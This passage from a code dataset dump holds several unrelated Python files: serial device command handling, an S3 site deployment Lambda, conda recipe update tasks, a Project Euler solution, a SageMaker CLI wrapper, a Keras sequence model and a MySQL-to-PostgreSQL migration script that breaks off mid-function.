acknowledgement of the command\n    def send_command(self, command, timeout=120):\n        serial = self._controller.serial\n        if serial.is_connected():\n            port = serial.port(self._port_name) if self._port_name else serial.port()\n            while port.busy: # we don't want to interleave serial messages\n                gevent.sleep(0.02)\n            try:\n                port.busy = True\n                self._last_ack = ''\n                ack_match = False\n                count = 0\n                send_q_r = False\n                start_time = None\n                while not ack_match:\n                    port.check_sum_error = False # reset this at the top of the command\n                    send_time = time.time()\n                    if not start_time:\n                        start_time = send_time\n                    if send_q_r:\n                        message = '%s:%s' % (self._device_id, 'qr')\n                        port.write_command(message)\n                        logging.debug('requesting resend %s:%s' % (self._device_id, command))\n                        logging.debug('sending %s:%s' % (self._device_id, 'qr'))\n                    else:\n                        message = '%s:%s' % (self._device_id, command)\n                        if (command != 'q' or not self._controller.config.serial.get('quiet_polling', True)) and self._controller.config.serial.get('log_messages', True):\n                            logging.debug('sending %s:%s' % (self._device_id, command))\n                        port.write_command(message)\n                        if count > 0:\n                            logging.debug('resend %d: %s:%s' % (count, self._device_id, command))\n                    count += 1\n\n                    # if broadcast message then we won't get an ack, we can break here\n                    if self._device_id == '*':\n                        
ack_match = True\n break\n\n # wait until ack or timeout\n while time.time() - send_time < 2:\n gevent.sleep(0.02)\n if send_q_r:\n if self._last_ack == 'qr':\n ack_match = True\n break\n else:\n if self._last_ack == command:\n ack_match = True\n break\n\n # see if we need to request a resend of messages\n if port.check_sum_error and ack_match and self._controller.config.serial.get('enable_polling_resends', False):\n send_q_r = True\n ack_match = False\n\n # eventually give up\n if not ack_match and time.time() - start_time > timeout:\n raise Exception('timeout waiting for ack (%s:%s)' % (self._device_id, command))\n finally:\n port.busy = False\n else:\n if (command != 'q' or not self._controller.config.serial.get('quiet_polling', True)) and self._controller.config.serial.get('log_messages', True):\n logging.debug('[sim] %s: %s' % (self._device_id, command))\n","sub_path":"rhizo/extensions/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":5706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
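# Hypothetical usage sketch of the Device class above (the controller comes
# from the rhizo framework and is not constructed here):
#
#     dev = Device.create('m1', controller)
#     dev.enable_checksum(True)     # sends "m1:checksum 1" and waits for the ack
#     dev.enable_polling(True, interval=0.5)
#     dev.send_command('q')         # blocks until the device echoes 'q' back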
+{"seq_id":"249326353","text":"import json\nimport boto3\nimport zipfile\nimport StringIO\nimport mimetypes\n\n\ndef lambda_handler(event, context):\n s3 = boto3.resource('s3')\n sns = boto3.resource('sns')\n\n topic = sns.Topic('arn:aws:sns:us-east-1:794138155809:deployPersonalLanding')\n\n location = {\n 'bucketName': 'build.ianbunn.studio',\n 'objectKey': 'personalLandingFiles.zip'\n }\n\n try:\n job = event.get('CodePipeline.job')\n if job:\n for artifact in job['data']['inputArtifacts']:\n if artifact['name'] == 'BuildArtifact':\n location = artifact['location']['s3Location']\n\n # Declaring s3 destination for files\n personal_bucket = s3.Bucket('ianbunn.studio')\n # Declaring s3 location of files\n build_personal_bucket = s3.Bucket(location['bucketName'])\n\n # Declares StringIO\n build_personal_zip = StringIO.StringIO()\n # Reads downloaded zip in memory using StringIO\n build_personal_bucket.download_fileobj(location['objectKey'], build_personal_zip)\n\n # Uploads all files downloaded and opened in memory to s3 destination\n with zipfile.ZipFile(build_personal_zip) as myzip:\n for name in myzip.namelist():\n obj = myzip.open(name)\n personal_bucket.upload_fileobj(obj, name,\n ExtraArgs={'ContentType': mimetypes.guess_type(name)[0]})\n personal_bucket.Object(name).Acl().put(ACL='public-read')\n\n topic.publish(Subject='AWS to IRB: Success', Message='Personal Landing has been deployed :)')\n\n if job:\n codepipeline = boto3.client('codepipeline')\n codepipeline.put_job_success_result(jobId=job['id'])\n\n except:\n topic.publish(Subject='AWS to IRB: Failure', Message='Personal Landing has failed X')\n raise\n return {\n 'statusCode': 200,\n 'body': json.dumps('Portfolio deployed at https://ianbunn.studio!')\n }\n","sub_path":"uploadPersonalLambda.py","file_name":"uploadPersonalLambda.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
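# The ContentType above comes from mimetypes.guess_type, which returns a
# (type, encoding) tuple; only the first element is used, e.g.:
import mimetypes

print(mimetypes.guess_type('index.html')[0])  # 'text/html'
print(mimetypes.guess_type('logo.png')[0])    # 'image/png'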
+{"seq_id":"582673132","text":"# coding: utf-8\n# Copyright (c) Materials Virtual Lab.\n\nimport hashlib\nimport os\nimport pkg_resources\nimport requests\nfrom invoke import task\n\nfrom monty.os import cd\n\n__author__ = \"Shyue Ping Ong\"\n__email__ = \"ongsp@ucsd.edu\"\n\n\nmodule_dir = os.path.dirname(os.path.abspath(__file__))\n\n\ndef load_template(fname):\n with open(fname) as f:\n contents = f.read()\n from jinja2 import Template\n return Template(contents)\n\n\ndef calc_md5(fname):\n hash_md5 = hashlib.md5()\n with open(fname, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n\n\n@task\ndef update_pypi(ctx, pkg):\n\n r = requests.get(\"http://pypi.org/project/%s/\" % pkg)\n html_doc = r.text\n from bs4 import BeautifulSoup\n soup = BeautifulSoup(html_doc, 'html.parser')\n header = soup.h1.text\n ver = header.strip().split()[-1]\n \n meta = os.path.join(module_dir, \"conda-skeletons\", pkg, \"meta.yaml\")\n url = \"https://pypi.io/packages/source/%s/%s/%s-%s.tar.gz\" % (pkg[0], pkg, pkg, ver)\n response = requests.get(url, stream=True)\n\n with open(\"temp.tar.gz\", \"wb\") as f:\n for data in response.iter_content():\n f.write(data)\n md5 = calc_md5(\"temp.tar.gz\")\n os.remove(\"temp.tar.gz\")\n\n lines = []\n current_ver = None\n with open(meta) as f:\n for l in f:\n if l.startswith('{% set version ='):\n current_ver = l.strip().split(\"=\")[-1]\n current_ver = current_ver.split(\"%\")[0].strip().strip(\"\\\"\")\n lines.append('{%% set version = \"%s\" %%}' % ver)\n elif l.startswith('{% set md5 =') and current_ver != ver and ver != \"different\":\n lines.append('{%% set md5 = \"%s\" %%}' % md5)\n else:\n lines.append(l.rstrip(\"\\n\"))\n\n if current_ver != ver and ver != \"different\":\n print(\"Updated %s from %s to %s!\" % (pkg, current_ver, ver))\n with open(meta, \"wt\") as f:\n f.write(\"\\n\".join(lines))\n else:\n print(\"%s current version (%s) is up to date!\" % (pkg, ver))\n\n\ndef get_env_version(pkg):\n try:\n return pkg_resources.get_distribution(pkg).version\n except (ImportError, pkg_resources.DistributionNotFound):\n return None\n return None\n\n\n@task\ndef generate_description(ctx):\n desc = []\n with cd(os.path.join(module_dir, \"conda-skeletons\")):\n for pkg in os.listdir(\".\"):\n with open(os.path.join(module_dir, \"conda-skeletons\", pkg, \"meta.yaml\")) as f:\n contents = f.read()\n from jinja2 import Template\n t = Template(contents)\n import yaml\n d = yaml.load(t.render())\n description = d[\"about\"].get(\"description\")\n if description is not None:\n desc.append('| %s | %s |
' % (t.module.name, description.strip()))\n with open(\"description.html\", \"wt\") as f:\n f.write(\"\" + \"\\n\".join(desc) + \"
\")\n\n\n@task\ndef update_templates(ctx):\n with cd(os.path.join(module_dir, \"conda-skeletons\")):\n for pkg in os.listdir(\".\"):\n update_pypi(ctx, pkg)\n\n\n@task\ndef build_conda(ctx, pkg):\n with cd(os.path.join(module_dir, \"conda-skeletons\")):\n print(\"Building %s\" % pkg)\n ctx.run(\"conda build --skip-existing --user matsci %s\" % pkg)\n # ctx.run(\"conda build --skip-existing --user matsci --python 3.6 %s\" % pkg)\n # ctx.run(\"conda build --skip-existing --user matsci --python 2.7 %s\" % pkg)\n\n@task\ndef build_all(ctx):\n pkgs = sorted(os.listdir(os.path.join(module_dir, \"conda-skeletons\")))\n pkgs = [p for p in pkgs if p.lower() not in [\"pybtex\", \"bader\", \"boltztrap\"]]\n for pkg in pkgs:\n try:\n build_conda(ctx, pkg)\n except:\n print(\"Failed for %s\" % pkg)\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
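# calc_md5() above hashes in 4 KiB chunks so large sdist tarballs never sit
# fully in memory; for small files the one-shot equivalent would be:
#
#     import hashlib
#     with open(fname, 'rb') as f:
#         digest = hashlib.md5(f.read()).hexdigest()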
+{"seq_id":"523782972","text":"#There are exactly ten ways of selecting three from five, 12345:\n#123, 124, 125, 134, 135, 145, 234, 235, 245, and 345\n#How many, not necessarily distinct, values of Pascal's triangle in the first 100 rows are greater than one million?\n\n\n# To get each number in a row, you multiply the previous number (all rows start with 1) by (row number - term number)/(1 + term number), with the first term after the leading 1 counted as term \"0\"\n\n# example: row 4 is 1 4 6 4 1, that is 1*(4/1) = 4, 4*(3/2) = 6, 6*(2/3) = 4, 4*(1/4) = 1\n\n# This means we don't need to cache Pascal's triangle, which was previously my intent to improve upon the brute force method. With a cutoff at one million as the result of a term, and utilizing the symmetry of the triangle,\n# this should produce the most efficient results\ncount = 0\nlimit = 1000000\nfor i in range(3,101,1):\n    term = 0\n    value = 1\n    while value < limit and term < i/2:\n        term += 1\n        value = value * (i-term+1)/(term)\n    \n    if value > limit:\n        count += (i+1) - 2*(term)\n    \n\nprint(\"the number of terms over 1 million in the first 100 rows of Pascal's Triangle is\", count)","sub_path":"Project Euler/Complete/053_Combinatoric_selections.py","file_name":"053_Combinatoric_selections.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
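# Sanity check of the recurrence used above, reproducing row 5 of Pascal's
# triangle (1 5 10 10 5 1) with integer arithmetic:
row, value, terms = 5, 1, [1]
for term in range(1, row + 1):
    value = value * (row - term + 1) // term
    terms.append(value)
print(terms)  # [1, 5, 10, 10, 5, 1]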
+{"seq_id":"208959693","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom common.execute_command import execute_one_parameter\n\n\n# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sagemaker/describe-processing-job.html\nif __name__ == '__main__':\n    \"\"\"\n\tcreate-processing-job : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sagemaker/create-processing-job.html\n\tlist-processing-jobs : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sagemaker/list-processing-jobs.html\n\tstop-processing-job : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sagemaker/stop-processing-job.html\n    \"\"\"\n\n    parameter_display_string = \"\"\"\n    # processing-job-name : The name of the processing job. The name must be unique within an AWS Region in the AWS account.\n    \"\"\"\n\n    add_option_dict = {}\n    #######################################################################\n    # setting option use\n    # ex: add_option_dict[\"setting_matching_parameter\"] = \"--owners\"\n    # ex: add_option_dict[\"setting_key\"] = \"owner_id\"\n\n    #######################################################################\n    # single parameter\n    # ex: add_option_dict[\"no_value_parameter_list\"] = \"--single-parameter\"\n\n    #######################################################################\n    # parameter display string\n    add_option_dict[\"parameter_display_string\"] = parameter_display_string\n\n    execute_one_parameter(\"sagemaker\", \"describe-processing-job\", \"processing-job-name\", add_option_dict)","sub_path":"sagemaker_read_1/processing-job_list.py","file_name":"processing-job_list.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
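# The helper above presumably ends up invoking the AWS CLI along the lines
# of `aws sagemaker describe-processing-job --processing-job-name <name>`
# (the real plumbing lives in common.execute_command, not shown here); a
# standalone subprocess sketch of that call:
import subprocess

def describe_processing_job(name):
    result = subprocess.run(
        ['aws', 'sagemaker', 'describe-processing-job',
         '--processing-job-name', name],
        capture_output=True, text=True)
    return result.stdout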
+{"seq_id":"261113553","text":"import numpy as np\r\nimport random\r\nfrom keras.layers import Dense, LSTM, Dropout, Activation, Bidirectional\r\nfrom keras.models import Sequential\r\nfrom keras.optimizers import RMSprop\r\n\r\n\r\ndef command_model(commands, epochs):\r\n    num_datos = len(commands)\r\n    note_register = sorted(list(set(commands)))\r\n    # print(note_register)\r\n    print(\"%i commands in total.\" % len(note_register))\r\n\r\n    note_indices = dict((c, i) for i, c in enumerate(note_register))\r\n    indices_note = dict((i, c) for i, c in enumerate(note_register))\r\n\r\n    maxlen = 20\r\n    step = 1\r\n    sequences = []\r\n    next_notes = []\r\n    for i in range(0, num_datos - maxlen, step):\r\n        sequences.append(commands[i: i + maxlen])\r\n        next_notes.append(commands[i + maxlen])\r\n\r\n    x = np.zeros((len(sequences), maxlen, len(note_register)), dtype=np.bool)\r\n    y = np.zeros((len(sequences), len(note_register)), dtype=np.bool)\r\n\r\n    for i, sequence in enumerate(sequences):\r\n        for t, note in enumerate(sequence):\r\n            x[i, t, note_indices[note]] = 1\r\n        y[i, note_indices[next_notes[i]]] = 1\r\n\r\n    def sample(preds, temperature=1.0):\r\n        preds = np.asarray(preds).astype('float64')\r\n        preds = np.log(preds) / temperature\r\n        exp_preds = np.exp(preds)\r\n        preds = exp_preds / np.sum(exp_preds)\r\n        probas = np.random.multinomial(1, preds, 1)\r\n        return np.argmax(probas)\r\n\r\n    def generate_music(length, diversity, model):\r\n        start_index = random.randint(0, num_datos - maxlen - 1)\r\n        generated = []\r\n        sentence = commands[start_index: start_index + maxlen]\r\n        generated += sentence\r\n        for i in range(length):\r\n            x_pred = np.zeros((1, maxlen, len(note_register)), dtype=np.bool)\r\n            for t, note in enumerate(sentence):\r\n                x_pred[0, t, note_indices[note]] = 1.\r\n\r\n            preds = model.predict(x_pred, verbose=0)[0]\r\n            next_index = sample(preds, diversity)\r\n            next_note = indices_note[next_index]\r\n\r\n            generated += [next_note]\r\n            sentence = sentence[1:] + [next_note]\r\n        return generated\r\n\r\n    notes_model = Sequential()\r\n    notes_model.add(LSTM(64, input_shape=(maxlen, len(note_register))))\r\n    notes_model.add(Dropout(0.2))\r\n    notes_model.add(Dense(len(note_register)))\r\n    notes_model.add(Activation('softmax'))\r\n    optimizer = RMSprop(lr=0.01)\r\n    # categorical_crossentropy matches the one-hot targets and softmax output\r\n    notes_model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\r\n\r\n    notes_model.fit(x, y, batch_size=64, epochs=epochs, verbose=0)\r\n\r\n    music_gen = generate_music(3000, 0.5, notes_model)\r\n\r\n    return music_gen\r\n","sub_path":"command_model.py","file_name":"command_model.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
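# Temperature demo for the sample() helper above: temperatures below 1
# sharpen the predicted distribution toward its argmax, above 1 flatten it.
import numpy as np

p = np.array([0.6, 0.3, 0.1])
for temp in (0.2, 1.0, 2.0):
    q = np.exp(np.log(p) / temp)
    q /= q.sum()
    print(temp, np.round(q, 3))  # 0.2 -> [0.97 0.03 0.  ], 2.0 -> [0.473 0.334 0.193]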
+{"seq_id":"526097410","text":"\"\"\"\nScript to migrate the existing data (in MySQL) into PostgreSQL\n\nPrereqs:\n* for each table in the old database, there is a corresponding file created\n via: mysqldump -u ozp -p ozp TABLENAME > TABLENAME.sql --complete-insert --hex-blob\n* all images have been copied to a local directory\n* the database referenced in settings.py is empty\n\nUsage:\n * acquire the sql dumps and images from the production server using the\n generate_sql_dumps.sh script (or similar)\n * update SQL_FILE_PATH, IMAGE_FILE_PATH, and DEFAULT_SECURITY_MARKING\n as necessary\n * if the attached database is not empty, run python manage.py flush\n * python onetime_db_migration.py\n\"\"\"\nimport datetime\nimport json\nimport logging\nimport os\nimport pytz\nimport re\nimport shutil\nimport sys\nimport uuid\n\nsys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '../')))\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'ozp.settings'\nimport django\nfrom django.conf import settings\n\nfrom ozpcenter import models\nfrom ozpcenter import model_access\nfrom ozpcenter import utils\n\nfrom ozpiwc import models as iwc_models\n\n# path to the SQL dump files\nSQL_FILE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'sql_dumps')\n# path to the images\nIMAGE_FILE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'images')\n\nDEFAULT_SECURITY_MARKING = \"TOP SECRET\"\n\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\n# logging.basicConfig(filename='migration.log', format='%(levelname)s: %(message)s', level=logging.INFO)\n\ndef get_date_from_str(date_str):\n \"\"\"\n Create a datetime object in UTC from a string\n\n Assumes the string was in format YYYY-MM-DD HH:MM:SS\n \"\"\"\n if not date_str:\n return None\n d = datetime.datetime.strptime(date_str, '%Y-%m-%d %H:%M:%S')\n return pytz.timezone('UTC').localize(d)\n\ndef get_index_next_unescaped_quote(str):\n \"\"\"\n Get the index of the next unescaped single quote in a given string\n \"\"\"\n for i, c in enumerate(str):\n if c == \"'\" and str[i-1] != \"\\\\\":\n return i\n\ndef get_columns(table):\n \"\"\"\n Get the columns of a table in an array\n\n Columns will be in the same order as the values appear in the data\n \"\"\"\n with open('{0!s}/{1!s}.sql'.format(SQL_FILE_PATH, table), 'r') as f:\n data = f.read().replace('\\n', '')\n # extract a string like (`id`, `version`, `created_by_id`)\n columns = utils.find_between(data, \"INSERT INTO `{0!s}`\".format(table), \" VALUES\")\n # remove parenthesis, backticks, and spaces\n columns = re.sub('[`() ]', '', columns)\n columns = columns.split(',')\n return columns\n\ndef get_values(table, column_count):\n \"\"\"\n Get the values of a table in an array of arrays\n\n Args:\n table: name of the database table\n column_count: number of columns in this table\n \"\"\"\n values = []\n with open('{0!s}/{1!s}.sql'.format(SQL_FILE_PATH, table), 'r') as f:\n data = f.read().replace('\\n', '')\n # extract the data we want\n values_str = utils.find_between(data, \"VALUES \", \");\") + ')'\n\n # values can contain special chars like parenthesis and commas, so we\n # have to be smart about how we extract the data\n\n while values_str:\n if values_str[0] != '(':\n logging.error('Error: each value must start with opening parenthesis')\n return None\n # remove leading '('\n values_str = values_str[1:]\n # create empty array that will hold all values for this entry\n entry_values = []\n current_entry_finished = False\n columns_processed 
= 0\n while not current_entry_finished:\n # check for hex value (includes booleans)\n if values_str[:2] == '0x':\n val = re.findall(r'0x[0-9ABCDEF]*', values_str)[0]\n if val == '0x00':\n entry_values.append(False)\n elif val == '0x01':\n entry_values.append(True)\n else:\n # assume the hex value is a UUID\n entry_values.append(uuid.UUID(hex=val[2:]))\n # remove extracted data from the original string\n idx = len(val)\n values_str = values_str[idx:]\n columns_processed += 1\n # logging.debug('got hex value: %s' % val)\n # remove comma\n if values_str[0] != ',' and columns_processed != column_count:\n logging.error('Error: comma not found after extracting hex value')\n return None\n if columns_processed < column_count:\n values_str = values_str[1:]\n # check for a string value\n elif values_str[0] == \"'\":\n # read all chars between this quote and next unescaped quote\n # remove the leading quote\n values_str = values_str[1:]\n # find the index of the next unescaped quote\n idx = get_index_next_unescaped_quote(values_str)\n val = values_str[:idx]\n entry_values.append(val)\n # remove extracted data from original string\n idx = len(val) + 1 # +1 for the trailing quote\n values_str = values_str[idx:]\n columns_processed += 1\n # logging.debug('got string value: %s' % val)\n # remove comma\n if values_str[0] != ',' and columns_processed != column_count:\n logging.error('Error: comma not found after extracting string value. string[0]: {0!s}'.format(values_str[0]))\n return None\n if columns_processed < column_count:\n values_str = values_str[1:]\n # check for NULL value\n elif values_str[0:4] == 'NULL':\n val = None\n entry_values.append(val)\n values_str = values_str[4:]\n columns_processed += 1\n # logging.debug('got NULL value: %s' % val)\n # remove comma\n if values_str[0] != ',' and columns_processed != column_count:\n logging.error('Error: comma not found after extracting NULL value')\n return None\n if columns_processed < column_count:\n values_str = values_str[1:]\n # check for integer value\n elif values_str[0] in ['0','1','2','3','4','5','6','7','8','9']:\n val = re.findall(r'\\d+', values_str)[0]\n entry_values.append(val)\n # remove extracted data from original string\n idx = len(val)\n values_str = values_str[idx:]\n columns_processed += 1\n # logging.debug('got integer value: %s' % val)\n # remove comma\n if values_str[0] != ',' and columns_processed != column_count:\n logging.error('Error: comma not found after extracting integer value')\n return None\n if columns_processed < column_count:\n values_str = values_str[1:]\n else:\n logging.error('Error: found invalid character in data: {0!s}'.format(values_str[0]))\n return None\n\n if columns_processed == column_count:\n current_entry_finished = True\n # logging.debug('completed processing of row')\n # remove closing parenthesis\n if values_str[0] != ')':\n logging.error('Error: closing parenthesis not found at end of row data')\n return None\n values_str = values_str[1:]\n # remove the comma between entries, unless this is the last entry\n if values_str:\n values_str = values_str[1:]\n\n values.append(entry_values)\n return values\n\ndef run():\n logging.info('running db_migration')\n # setup: http://stackoverflow.com/questions/25537905/django-1-7-throws-django-core-exceptions-appregistrynotready-models-arent-load\n django.setup()\n\n # first, create the default groups\n # Create Groups\n logging.info('creating default groups')\n models.Profile.create_groups()\n # create default image types\n logging.info('creating default image 
types')\n small_icon_type = models.ImageType(name='small_icon',\n max_size_bytes='4096')\n small_icon_type.save()\n large_icon_type = models.ImageType(name='large_icon',\n max_size_bytes='8192')\n large_icon_type.save()\n banner_icon_type = models.ImageType(name='banner_icon',\n max_size_bytes='2097152')\n banner_icon_type.save()\n large_banner_icon_type = models.ImageType(name='large_banner_icon',\n max_size_bytes='2097152')\n large_banner_icon_type.save()\n small_screenshot_type = models.ImageType(name='small_screenshot',\n max_size_bytes='1048576')\n small_screenshot_type.save()\n large_screenshot_type = models.ImageType(name='large_screenshot',\n max_size_bytes='1048576')\n large_screenshot_type.save()\n\n category_mapper = migrate_category()\n agency_mapper = migrate_agency()\n type_mapper = migrate_type()\n contact_type_mapper = migrate_contact_type()\n profile_mapper = migrate_profile()\n notification_mapper = migrate_notification(profile_mapper)\n migrate_profile_dismissed_notifications(profile_mapper, notification_mapper)\n listing_mapper = migrate_listing(category_mapper, agency_mapper, type_mapper,\n contact_type_mapper, profile_mapper)\n migrate_application_library_entry(profile_mapper, listing_mapper)\n migrate_doc_url(listing_mapper)\n migrate_item_comment(profile_mapper, listing_mapper)\n migrate_iwc_data_object(profile_mapper)\n migrate_listing_category(listing_mapper, category_mapper)\n migrate_listing_profile(profile_mapper, listing_mapper)\n migrate_listing_screenshot(listing_mapper)\n migrate_listing_tags(listing_mapper)\n migrate_contact(listing_mapper, contact_type_mapper)\n listing_activity_mapper = migrate_listing_activities(profile_mapper, listing_mapper)\n migrate_change_detail(listing_activity_mapper)\n migrate_rejection_data(listing_mapper, listing_activity_mapper)\n\n\ndef migrate_category():\n logging.debug('migrating categories...')\n columns = get_columns('category')\n # ['id', 'version', 'created_by_id', 'created_date', 'description', 'edited_by_id', 'edited_date', 'title']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'created_by_id'\n assert columns[3] == 'created_date'\n assert columns[4] == 'description'\n assert columns[5] == 'edited_by_id'\n assert columns[6] == 'edited_date'\n assert columns[7] == 'title'\n values = get_values('category', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Categories to migrate: {0!s}'.format(len(values)))\n # logging.debug('category values: %s' % values)\n # map old ids to new ones for future migrations: {'': ''}\n category_mapper = {}\n logging.info('==========================')\n for i in values:\n old_id = i[0]\n description = i[4]\n title = i[7]\n logging.info('Adding category title: {0!s}, description: {1!s}'.format(title, description))\n cat = models.Category(description=description, title=title)\n cat.save()\n category_mapper[i[0]] = str(cat.id)\n return category_mapper\n\ndef migrate_agency():\n logging.debug('migrating agencies...')\n columns = get_columns('agency')\n # ['id', 'version', 'created_by_id', 'created_date', 'edited_by_id', 'edited_date', 'icon_id', 'short_name', 'title']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'created_by_id'\n assert columns[3] == 'created_date'\n assert columns[4] == 'edited_by_id'\n assert columns[5] == 'edited_date'\n assert columns[6] == 'icon_id'\n assert columns[7] == 'short_name'\n assert columns[8] == 'title'\n values = get_values('agency', len(columns))\n # 
logging.debug('category columns: %s' % columns)\n logging.info('Agencies to migrate: {0!s}'.format(len(values)))\n # logging.debug('agency values: %s' % values)\n # map old ids to new ones for future migrations: {'': ''}\n agency_mapper = {}\n logging.info('==========================')\n for i in values:\n old_id = i[0]\n short_name = i[7]\n title = i[8]\n logging.info('Adding agency title: {0!s}, short_name: {1!s}'.format(title, short_name))\n a = models.Agency(short_name=short_name, title=title)\n a.save()\n agency_mapper[i[0]] = str(a.id)\n return agency_mapper\n\ndef migrate_type():\n logging.debug('migrating type...')\n columns = get_columns('type')\n # ['id', 'version', 'created_by_id', 'created_date', 'description', 'edited_by_id', 'edited_date', 'title']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'created_by_id'\n assert columns[3] == 'created_date'\n assert columns[4] == 'description'\n assert columns[5] == 'edited_by_id'\n assert columns[6] == 'edited_date'\n assert columns[7] == 'title'\n values = get_values('type', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Listing Types to migrate: {0!s}'.format(len(values)))\n # logging.debug('agency values: %s' % values)\n # map old ids to new ones for future migrations: {'': ''}\n type_mapper = {}\n logging.info('==========================')\n for i in values:\n old_id = i[0]\n description = i[4]\n title = i[7]\n logging.info('Adding listing type title: {0!s}, description: {1!s}'.format(title, description))\n t = models.ListingType(title=title, description=description)\n t.save()\n type_mapper[i[0]] = str(t.id)\n return type_mapper\n\ndef migrate_contact_type():\n logging.debug('migrating contact_type...')\n columns = get_columns('contact_type')\n # ['id', 'version', 'created_by_id', 'created_date', 'edited_by_id', 'edited_date', 'required', 'title']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'created_by_id'\n assert columns[3] == 'created_date'\n assert columns[4] == 'edited_by_id'\n assert columns[5] == 'edited_date'\n assert columns[6] == 'required'\n assert columns[7] == 'title'\n values = get_values('contact_type', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('ContactTypes to migrate: {0!s}'.format(len(values)))\n # logging.debug('agency values: %s' % values)\n # map old ids to new ones for future migrations: {'': ''}\n contact_type_mapper = {}\n logging.info('==========================')\n for i in values:\n old_id = i[0]\n required = i[6]\n title = i[7]\n logging.info('Adding contact_type title: {0!s}, required: {1!s}'.format(title, required))\n ct = models.ContactType(name=title, required=required)\n ct.save()\n contact_type_mapper[i[0]] = str(ct.id)\n return contact_type_mapper\n\ndef migrate_profile():\n logging.debug('migrating profile...')\n columns = get_columns('profile')\n # ['id', 'version', 'bio', 'created_by_id', 'created_date', 'display_name', 'edited_by_id', 'edited_date', 'email', 'highest_role', 'last_login', 'username', 'launch_in_webtop']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'bio'\n assert columns[3] == 'created_by_id'\n assert columns[4] == 'created_date'\n assert columns[5] == 'display_name'\n assert columns[6] == 'edited_by_id'\n assert columns[7] == 'edited_date'\n assert columns[8] == 'email'\n assert columns[9] == 'highest_role'\n assert columns[10] == 'last_login'\n assert columns[11] == 'username'\n assert 
columns[12] == 'launch_in_webtop'\n values = get_values('profile', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Profiles to migrate: {0!s}'.format(len(values)))\n # logging.debug('agency values: %s' % values)\n # map old ids to new ones for future migrations: {'': ''}\n profile_mapper = {}\n logging.info('==========================')\n for i in values:\n old_id = i[0]\n bio = i[2]\n display_name = i[5]\n email = i[8]\n highest_role = i[9]\n last_login = i[10]\n username = i[11]\n if not display_name:\n display_name = username\n kwargs = {\n 'bio': bio,\n 'display_name': display_name,\n 'email': email,\n 'dn': username\n }\n # TODO: how to extract CN from DN?\n cn = username\n # sanitize username\n username = cn[0:30] # limit to 30 chars\n username = username.replace(' ', '_') # no spaces\n username = username.replace(\"'\", \"\") # no apostrophes\n username = username.lower() # all lowercase\n\n # don't bother updating groups, organizations, permissions - this will\n # be done automatically the first time authorization is checked\n p = models.Profile.create_user(username, **kwargs)\n\n logging.info('Adding profile username: {0!s}, display_name: {1!s}, dn: {2!s}'.format(p.user.username, p.display_name, p.dn))\n profile_mapper[i[0]] = str(p.id)\n return profile_mapper\n\ndef migrate_notification(profile_mapper):\n logging.debug('migrating notification...')\n columns = get_columns('notification')\n # ['id', 'version', 'created_by_id', 'created_date', 'edited_by_id', 'edited_date', 'message', 'expires_date']\n assert columns[0] == 'id'\n assert columns[1] == 'version'\n assert columns[2] == 'created_by_id'\n assert columns[3] == 'created_date'\n assert columns[4] == 'edited_by_id'\n assert columns[5] == 'edited_date'\n assert columns[6] == 'message'\n assert columns[7] == 'expires_date'\n values = get_values('notification', len(columns))\n # logging.debug('category columns: %s' % columns)\n logging.info('Notifications to migrate: {0!s}'.format(len(values)))\n # logging.debug('agency values: %s' % values)\n # map old ids to new ones for future migrations: {'': ''}\n notification_mapper = {}\n logging.info('==========================')\n for i in values:\n old_id = i[0]\n message = i[6]\n expires_date = get_date_from_str(i[7])\n created_date = get_date_from_str(i[3])\n created_by_id = i[2]\n logging.info('Adding notification message: {0!s}, expires_date: {1!s}'.format(message, expires_date))\n p = models.Profile.objects.get(id=profile_mapper[created_by_id])\n n = models.Notification(message=message, expires_date=expires_date, created_date=created_date, author=p)\n n.save()\n notification_mapper[i[0]] = str(n.id)\n return notification_mapper\n\ndef migrate_profile_dismissed_notifications(profile_mapper, notification_mapper):\n logging.debug('migrating migrate_profile_dismissed_notifications...')\n columns = get_columns('profile_dismissed_notifications')\n # ['notification_id', 'profile_id']\n assert columns[0] == 'notification_id'\n assert columns[1] == 'profile_id'\n values = get_values('profile_dismissed_notifications', len(columns))\n logging.info('Dismissed notifications to migrate: {0!s}'.format(len(values)))\n for i in values:\n notification_id = i[0]\n profile_id = i[1]\n notification = models.Notification.objects.get(id=notification_mapper[notification_id])\n profile = models.Profile.objects.get(id=profile_mapper[profile_id])\n notification.dismissed_by.add(profile)\n\ndef 